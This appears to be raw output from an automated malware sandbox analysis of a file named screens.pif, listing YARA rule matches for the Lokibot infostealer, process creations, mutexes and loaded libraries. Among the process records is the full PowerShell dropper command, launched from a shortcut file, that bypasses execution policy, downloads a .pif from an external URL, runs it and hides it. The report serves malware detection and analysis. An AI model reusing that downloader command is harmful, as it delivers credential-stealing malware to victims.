Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D5B5B8	4_2_02D5B5B8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D5B978	4_2_02D5B978
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D52D20	4_2_02D52D20
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56A90	4_2_02D56A90
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56A80	4_2_02D56A80
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D5A668	4_2_02D5A668
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56218	4_2_02D56218
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D518CF	4_2_02D518CF
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D564F1	4_2_02D564F1
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56870	4_2_02D56870
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56863	4_2_02D56863
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D52439	4_2_02D52439
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D545C0	4_2_02D545C0
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D579C2	4_2_02D579C2
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D531E8	4_2_02D531E8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D5459F	4_2_02D5459F
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56D58	4_2_02D56D58
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56D48	4_2_02D56D48
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE0B88	4_2_0ABE0B88
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEE08F	4_2_0ABEE08F
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE2637	4_2_0ABE2637
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABECDC0	4_2_0ABECDC0
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE0B78	4_2_0ABE0B78
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE0006	4_2_0ABE0006
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE0040	4_2_0ABE0040
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE1FB8	4_2_0ABE1FB8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE1FC8	4_2_0ABE1FC8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEBC27	4_2_0ABEBC27
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE8520	4_2_0ABE8520
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABECD1C	4_2_0ABECD1C
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0AEA0040	4_2_0AEA0040
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0AEA0025	4_2_0AEA0025
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D067918	4_2_0D067918
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D065528	4_2_0D065528
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D067088	4_2_0D067088
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D068393	4_2_0D068393
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D0692E0	4_2_0D0692E0
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D060F08	4_2_0D060F08
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D0619C8	4_2_0D0619C8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D0619D8	4_2_0D0619D8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D06B8B8	4_2_0D06B8B8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D061778	4_2_0D061778
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D06B620	4_2_0D06B620
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D0616E8	4_2_0D0616E8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D0611F3	4_2_0D0611F3
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D06704A	4_2_0D06704A
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D060310	4_2_0D060310
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D060320	4_2_0D060320
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D067358	4_2_0D067358
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D06A218	4_2_0D06A218
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D06F218	4_2_0D06F218
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0D0692BA	4_2_0D0692BA
Source: C:\Users\user\Desktop\screens.pif	Code function: 5_2_0040549C	5_2_0040549C
Source: C:\Users\user\Desktop\screens.pif	Code function: 5_2_004029D4	5_2_004029D4

Source: C:\Users\user\Desktop\screens.pif	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\screens.pif	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\user\Desktop\screens.pif

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80

Source: screens.pif.0.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: screens.pif.0.dr

Static PE information: Section: j1CM!e^U ZLIB complexity 1.0003301933811801

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@12/12@3/2

Source: C:\Users\user\Desktop\screens.pif

Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

5_2_0040650A

Source: C:\Users\user\Desktop\screens.pif

Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

5_2_0040434D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\screens.pif

Jump to behavior

Source: C:\Users\user\Desktop\screens.pif	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\screens.pif	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6092
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5852

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmzi4otn.c2j.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: Comprobante.lnk.lnk

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\screens.pif "C:\Users\user\Desktop\screens.pif"
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\screens.pif "C:\Users\user\Desktop\screens.pif"	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
